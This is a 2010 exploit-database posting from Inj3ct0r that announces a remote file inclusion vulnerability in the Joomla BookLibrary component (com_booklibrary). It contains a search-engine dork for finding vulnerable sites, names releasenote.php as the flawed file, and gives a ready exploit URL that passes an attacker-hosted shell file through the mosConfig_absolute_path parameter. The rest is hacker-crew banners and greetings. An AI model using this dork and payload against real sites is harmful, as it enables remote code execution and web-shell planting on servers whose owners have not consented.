Joomla Component (com_booklibrary) Remote File Include Vulne
Posted on 08 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component (com_booklibrary) Remote File Include Vulnerablility</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================== Joomla Component (com_booklibrary) Remote File Include Vulnerablility ===================================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################### 1 0 I'm **RoAd_KiLlEr** member from Inj3ct0r Team 1 1 ########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+]Title Joomla Component (com_booklibrary) Remote File Include Vulnerablility [+]Author **RoAd_KiLlEr** [+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws [+]Tested on Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws [~] Home: http://inj3ct0r.com [~] Version: 1.0 [~] Vendor: http://extensions.joomla.org/extensions/owner/akbett [~] Application Link:http://extensions.joomla.org/extensions/vertical-markets/education-a-culture/books-a-libraries/3728?qh=YTo0OntpOjA7czozOiJjb20iO2k6MTtzOjc6ImNvbW1pbmciO2k6MjtzOjExOiJib29rbGlicmFyeSI7aTozO3M6MTU6ImNvbSBib29rbGlicmFyeSI7fQ%3D%3D ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+]Description: BookLibrary provides a full-featured book library or book collection management environment on a Joomla-based website. It allows you to manage large book libraries. The component can also be used to easily set up a book selling shop using Amazon if you want. With an Amazon Associates ID (as an Amazon affiliate) you can earn credits with book sales through Amazon, while Amazon takes care of the handling and shipping. ========================================= [+] Dork: inurl:"com_booklibrary" ========================================== [+] Bug In : releasenote.php ========================================== [+]. RFI Vulnerability =+=+=+=+=+=+=+=+=+ [Exploit]: http://127.0.0.1/administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=[Your Evil Shell.txt?] =========================================================================================== [!] Albanian Hacking Crew =========================================================================================== [!] **RoAd_KiLlEr** =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers =========================================================================================== [!] Spec Th4nks: r0073r | indoushka from Dz-Ghost Team | MaFFiTeRRoR | All Inj3ct0r 31337 Members | And All My Friendz =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN =========================================================================================== # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
